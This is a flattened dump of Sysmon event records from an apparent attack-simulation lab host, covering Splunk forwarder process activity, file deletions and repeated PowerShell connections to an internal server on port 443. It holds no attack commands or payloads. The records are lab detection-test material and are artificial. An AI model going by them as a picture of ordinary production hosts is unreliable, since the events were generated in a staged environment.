Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD2BC3EB566AB2D9937EA7CA9BB42771,SHA256=407FE11EB65EE8662A7DE778F539B04D2BF1C9C90AEB378544CB55DD3E14BB34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:14.098{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DCA-613A-2F90-03000000C801}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084148Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:14.098{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084147Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:14.098{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084146Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:14.098{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084145Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:14.098{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084144Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:14.098{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4DCA-613A-2F90-03000000C801}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084143Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:14.098{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DCA-613A-2F90-03000000C801}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084142Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:14.084{B81B27B7-4DCA-613A-2F90-03000000C801}6752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:15.622{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77BA1FAC3D9404FAFB393C196459A2DF,SHA256=5DA04C9393B90AAFC75E2903B608782A750CCC05B61B13119C8BC87CAFB2EB35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:39.729{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56571-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:16.640{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79774C784791607625471830C0D70C03,SHA256=74CCBE6112546CED62DF3211D8696D13D236FCDFD40CEB0187F9936957D6E0A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:17.671{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=864827C1E6689C2567CDD903FAD8CCAE,SHA256=CD92E3D21E0EA01E8E7B70A75EAE27DE2815F760770444D190050F64D56B7371,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:18.685{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C462FC78EE237B617485F01FC279D890,SHA256=5C7C0C940124ECD8900829380FD4AD7A25746111538B4D59B6E61C5F96DD69B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:42.119{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56572-false10.0.1.12-8000- 23542300x800000000000000035084160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:19.700{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE0F55C20092B6E47417106F18BFF2F3,SHA256=91E88452FF17ACB1654F9AA978B62DDD8B77B1FD5E9C48E1DC474C4567C03DE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:20.937{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8FDE6F4EA1DF534EA832B2474DA6C593,SHA256=A954167DBD299D7AC588DBB5AAEF080B566D33FC97FA6017AE1D36E4393699EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:20.717{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8408BFCC6EC79E5EE578A93B193ED6C2,SHA256=08EDE5018F27D8EDE9B4EB848E674BD98396752CAE87CEB4EDC416BDB3C088F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:21.736{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A0CAEB3EFE1332D752DCE5127EA4DDE,SHA256=FD209E6D541E6B36CC1713A579106EEB27B63A262254BDDE2895BC8D8710FE58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:45.737{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56573-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:22.739{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5938A6E3CC7EF400407234937772470,SHA256=56366D1075E3C09A4E0C07C2F55CF6D24FCE2F6449C7F9C95BB62B622B9C05E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:23.769{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9A11899975ADDF3CBED15975C635C4A,SHA256=B9F04DA4FC30845CE45AA6CED106FB119E171C06387CBA3C22F16FCBD9EF48C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:48.114{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56574-false10.0.1.12-8000- 23542300x800000000000000035084168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:24.785{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D9FE58AEF0F6C0EB939143AFAFC3558,SHA256=8C67C3BDEC158833DB8221D84627383671D8DEBAE9DED9E6CF4E95C085510220,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:25.790{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=022453ADCD3E112B6E65973C9F08F319,SHA256=AD368E928B7E14AD8099DCB238C13D52409F8D501679B6DF3C5BF9AC5AEE1306,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:25.743{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=625BB293D327B9B01C16C33A6384BC15,SHA256=BBB669D8DFD09A1EC8E89189E200B17AA4ECBC398959A27456A55CE07FCBDA5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:26.831{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6762F4271BB0F892A6F18B95FF4F00A,SHA256=339C4F25922B057D0E49689CFF7C9727E5A3622288FC78566AED8E0885782EF0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:50.755{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56575-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:27.851{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB8D41910E747E67871F6B405153F8C0,SHA256=90774D4B63A60C606E6ED0C7CB962EA1BBA0943210D0FBB7944EAFEA008651AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.880{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26B60CC8D71E2B1B5A7FC520032FA9B8,SHA256=35AB6D0AFF84E1EBEFAACB9B5DDC1FD63A1DA32BBF83453C037A71854A8246F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.334{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DD8-613A-3090-03000000C801}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.334{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.334{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.334{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.334{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.334{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4DD8-613A-3090-03000000C801}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.334{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DD8-613A-3090-03000000C801}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:28.329{B81B27B7-4DD8-613A-3090-03000000C801}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:29.895{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55EC209DAAF1AFC63182A3CF9B5C0013,SHA256=3EB34A0978ECDEF4244E8C12EBC062F73C9E518E55944C68D96DD76E4B8F44B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:53.267{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program 